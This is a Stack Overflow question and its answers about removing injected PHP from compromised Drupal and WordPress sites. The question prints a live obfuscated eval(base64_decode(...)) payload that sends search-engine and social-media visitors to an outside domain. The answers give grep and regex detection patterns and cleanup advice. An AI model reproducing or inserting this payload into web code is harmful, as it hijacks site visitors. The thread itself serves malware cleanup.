0

I've been having issues on my server with the following PHP inserted in all of my Drupal and Wordpress sites.

I have downloaded a full backup of my sites and will clean them all before changing my ftp details and reuploading them again. Hopefully this should clear things up.

My question is:

Using Notepad++ is there a *.* style search criteria I could use to scan my backup files and delete the lines of malicious code without having to do them all individually on my local machine?

This would clearly save me loads of time. Up to now, I've been replacing the following code with blank but the eval code varies on each of my sites.

eval(base64_decode("DQplcnJvcl9yZXBvcnRpbmcoMCk7DQokcWF6cGxtPWhlYWRlcnNfc2VudCgpOw0KaWYgKCEkcWF6cGxtKXsNCiRyZWZlcmVyPSRfU0VSVkVSWydIVFRQX1JFRkVSRVInXTsNCiR1YWc9JF9TRVJWRVJbJ0hUVFBfVVNFUl9BR0VOVCddOw0KaWYgKCR1YWcpIHsNCmlmIChzdHJpc3RyKCRyZWZlcmVyLCJ5YWhvbyIpIG9yIHN0cmlzdHIoJHJlZmVyZXIsImJpbmciKSBvciBzdHJpc3RyKCRyZWZlcmVyLCJyYW1ibGVyIikgb3Igc3RyaXN0cigkcmVmZXJlciwiZ29nbyIpIG9yIHN0cmlzdHIoJHJlZmVyZXIsImxpdmUuY29tIilvciBzdHJpc3RyKCRyZWZlcmVyLCJhcG9ydCIpIG9yIHN0cmlzdHIoJHJlZmVyZXIsIm5pZ21hIikgb3Igc3RyaXN0cigkcmVmZXJlciwid2ViYWx0YSIpIG9yIHN0cmlzdHIoJHJlZmVyZXIsImJlZ3VuLnJ1Iikgb3Igc3RyaXN0cigkcmVmZXJlciwic3R1bWJsZXVwb24uY29tIikgb3Igc3RyaXN0cigkcmVmZXJlciwiYml0Lmx5Iikgb3Igc3RyaXN0cigkcmVmZXJlciwidGlueXVybC5jb20iKSBvciBwcmVnX21hdGNoKCIveWFuZGV4XC5ydVwveWFuZHNlYXJjaFw/KC4qPylcJmxyXD0vIiwkcmVmZXJlcikgb3IgcHJlZ19tYXRjaCAoIi9nb29nbGVcLiguKj8pXC91cmwvIiwkcmVmZXJlcikgb3Igc3RyaXN0cigkcmVmZXJlciwibXlzcGFjZS5jb20iKSBvciBzdHJpc3RyKCRyZWZlcmVyLCJmYWNlYm9vay5jb20iKSBvciBzdHJpc3RyKCRyZWZlcmVyLCJhb2wuY29tIikpIHsNCmlmICghc3RyaXN0cigkcmVmZXJlciwiY2FjaGUiKSBvciAhc3RyaXN0cigkcmVmZXJlciwiaW51cmwiKSl7DQpoZWFkZXIoIkxvY2F0aW9uOiBodHRwOi8vY29zdGFicmF2YS5iZWUucGwvIik7DQpleGl0KCk7DQp9DQp9DQp9DQp9"));
kenorb
  • 155,785
  • 88
  • 678
  • 743
user1192442
  • 1
  • 2
  • 2
    possible duplicate of [eval base64_decode php virus](http://stackoverflow.com/questions/5922762/eval-base64-decode-php-virus) – PeeHaa Feb 06 '12 at 14:10
  • 2
    You should find out what hole is being exploited to hack into your website and fix it. Else it will be re-hacked at some point. – igorw Feb 06 '12 at 14:12

3 Answers3

3

I would change your FTP details immediately. You don't want them hosting warez or something if they have been able to work out the password.

Then shutdown your site so that your visitors are not subjected to any scripts or hijacks.

As far as searching goes a regex like this should sort it out:

eval\(base64_decode\("[\d\w]+"\)\);
Treffynnon
  • 21,365
  • 6
  • 65
  • 98
1

I've also had the same problem with my WordPress blogs, eval base64_decode hack. The php files were being injected with those eval lines. I suggest you reinstall wordpress/drupal, as some other scripts may already be present in your site, then change all passwords.

Try running grep through ssh, eg. grep -r -H "eval base64_decode". It'll show you which files are infected. Then if you have time, automate the process so you will be notified in case it happens again.

And in the future, always update WordPress/Drupal.

gerky
  • 6,267
  • 11
  • 55
  • 82
0

It's easier if you can use special tools to remove this malicious code, because it could be tricky to find the actual regex to match all the code and you never know if that worked, or you broken your site. Especially when you've multiple files, you should identify the suspicious files by the following commands:

grep -R eval.*base64_decode  .
grep -R return.*base64_decode  .

but it could be not enough, so you should consider using these PHP security scanners.

For more details, check: How to get rid of eval-base64_decode like PHP virus files?.

For Drupal, check also: How to remove malicious scripts from admin pages after being hacked?

Community
  • 1
  • 1
kenorb
  • 155,785
  • 88
  • 678
  • 743